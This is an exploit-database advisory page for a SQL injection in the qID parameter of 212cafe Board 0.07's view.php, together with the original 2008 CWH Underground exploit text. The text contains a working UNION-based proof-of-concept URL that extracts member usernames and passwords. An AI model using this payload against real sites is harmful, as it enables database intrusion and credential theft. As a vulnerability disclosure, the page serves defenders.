212cafe Board (view.php qID) Remote SQL Injection Vulnerability

vendor:

212cafe Board

by:

CWH Underground

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: 212cafe Board

Affected Version From: 0.07

Affected Version To: 0.07

Patch Exists: NO

Related CWE: N/A

CPE: a:212cafe:212cafe_board

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

212cafe Board (view.php qID) Remote SQL Injection Vulnerability

A vulnerability exists in the view.php file of the 212cafe Board application, version 0.07, which allows an attacker to inject arbitrary SQL commands. The vulnerability is due to the application not properly sanitizing user-supplied input to the 'qID' parameter. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing an SQL injection payload to the vulnerable application. Successful exploitation could result in the attacker gaining access to sensitive information from the database.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

===================================================================
  212cafe Board (view.php qID) Remote SQL Injection Vulnerability
===================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 26 September 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : 212cafe Board 
VERSION     : 0.07
VENDOR      : http://www.212cafe.com/
DOWNLOAD    : http://php.deeserver.net/download/get/12/212cafeboard_v0_07.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

-----------------------------------
 Vulnerable File (view.php)
-----------------------------------

$query="SELECT * FROM board_question WHERE (qID='$qID')";

---------
 Exploit
---------

[+] http://[Target]/[212cafeboard]/view.php?qID=[SQL Injection]


------
 POC
------

[+] http://[Target]/[212cafeboard]/view.php?qID=-9999')/**/UNION/**/SELECT/**/1,concat(mUser,0x3a3a,mPasswd),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/board_member/**/WHERE/**/(mID='1


#####################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-09-26]